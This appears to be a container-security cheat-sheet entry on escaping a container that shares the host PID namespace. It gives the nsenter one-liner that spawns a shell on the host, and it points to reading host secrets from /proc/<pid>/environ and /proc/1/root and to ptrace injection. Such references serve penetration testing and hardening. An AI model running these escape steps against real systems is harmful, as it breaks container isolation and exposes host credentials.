Host PID namespace

With the host PID namespace shared, the container sees all host processes and their /proc entries. Given the capabilities to match (CAP_SYS_ADMIN for nsenter, or CAP_SYS_PTRACE for injection), it can enter a host process's namespaces and run on the host.

bash
ps -ef | head                                   # host processes are visible
# Enter the host namespaces of init and run a shell on the host
nsenter --target 1 --mount --uts --ipc --net --pid -- sh

Exploitation notes#

  • nsenter --target 1 --mount ... sh is the canonical one-liner; it needs CAP_SYS_ADMIN and the shared PID namespace to resolve PID 1.
  • Without nsenter rights, read host secrets through /proc/<pid>/environ and reach the host filesystem through /proc/1/root, covered in Host process access.
  • With CAP_SYS_PTRACE, inject into a host process instead, as in CAP_SYS_PTRACE.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more